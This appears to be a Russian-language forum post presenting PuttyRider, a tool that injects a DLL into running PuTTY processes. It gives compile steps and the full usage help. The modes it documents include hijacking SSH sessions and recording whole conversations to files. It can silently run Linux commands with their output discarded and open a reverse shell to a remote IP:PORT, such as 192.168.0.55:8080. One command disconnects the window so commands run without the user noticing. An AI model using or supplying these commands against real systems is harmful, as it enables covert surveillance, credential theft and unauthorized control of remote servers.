PuttyRider - это инструмент с открытым исходным кодом для перехвата сеансов Putty для прослушивания разговоров и ввода команд Linux.
Компиляция:
Используйте командную строку Visual Studio:
[/SIZE]
nmake main dll
[SIZE=4]
Использование
Код:
Operation modes:
-l List the running Putty processes and their connections
-w Inject in all existing Putty sessions and wait for new sessions
to inject in those also
-p PID Inject only in existing Putty session identified by PID.
If PID==0, inject in the first Putty found
-x Cleanup. Remove the DLL from all running Putty instances
-d Debug mode. Only works with -p mode
-c CMD Automatically execute a Linux command after successful injection
PuttyRider will remove trailing spaces and '&' character from CMD
PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD
-h Print this help
Output modes:
-f Write all Putty conversation to a file in the local directory.
The filename will have the PID of current putty.exe appended
-r IP:PORT Initiate a reverse connection to the specified machine and
start an interactive session.
Interactive commands (after you receive a reverse connection):
!status See if the Putty window is connected to user input
!discon Disconnect the main Putty window so it won't display anything
This is useful to send commands without the user to notice
!recon Reconnect the Putty window to its normal operation mode
CMD Linux shell commands
!exit Terminate this connection
!help Display help for client connection
Список существующих процессов Putty и их статус (введено / не введено)
PuttyRider.exe -l
Внедрите DLL в первый найденный putty.exe и инициируйте обратное соединение от DLL к своему IP: порту, затем выйдите из PuttyRider.exe.
PuttyRider.exe -p 0 -r 192.168.0.55:8080
Запускаем в фоновом режиме и ждем новых процессов Putty. Вставьте любой новый putty.exe и запишите все разговоры в локальные файлы.
PuttyRider.exe -w -f
Извлеките PuttyRider.dll из всех процессов Putty, в которые он уже внедрен. (Не забудьте убить PuttyRider.exe, если он работает в режиме -w, иначе он будет повторно вставлен.)
PuttyRider.exe -x